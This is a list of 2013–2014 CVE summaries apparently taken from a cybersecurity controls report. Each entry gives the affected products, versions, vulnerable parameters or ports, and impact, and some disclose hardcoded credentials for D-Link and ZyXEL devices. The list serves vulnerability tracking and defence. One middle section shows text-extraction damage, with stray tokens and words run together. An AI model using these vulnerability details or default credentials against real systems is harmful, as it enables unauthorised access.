Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.

CVE-2013-2780
Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).

CVE-2013-2803
ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.

CVE-2013-2824
Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.

CVE-2013-2826
WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920
The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a //www.google.com/ substring.

CVE-2013-3064
Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116
Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3137
Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability."

CVE-2013-3194
Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3199
Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3201
Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206
Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280
EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387
Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417
The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632
The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656
Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856
Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2013-3860
Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."

CVE-2013-3893
Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE-2013-3897
Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3900
The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."

CVE-2013-3905
Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."

CVE-2013-4223
The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436
The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478
Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529
Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555
Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776
NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem.

CVE-2013-4782

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28

The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password

CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo

CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service

CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors

CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors

CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674

CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975

CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521

CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139

CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors related to a "code injection vulnerability".

CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.

CVE-2014-0001: Buffer overflow in client/mysqlcc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster. Page 22 of 28

CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".

CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability".

CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability".

CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-0321.

CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)".

CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion", a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.

CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability".

CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability".

CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability".

CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability".

CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2773.

CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.

CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2788.

CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

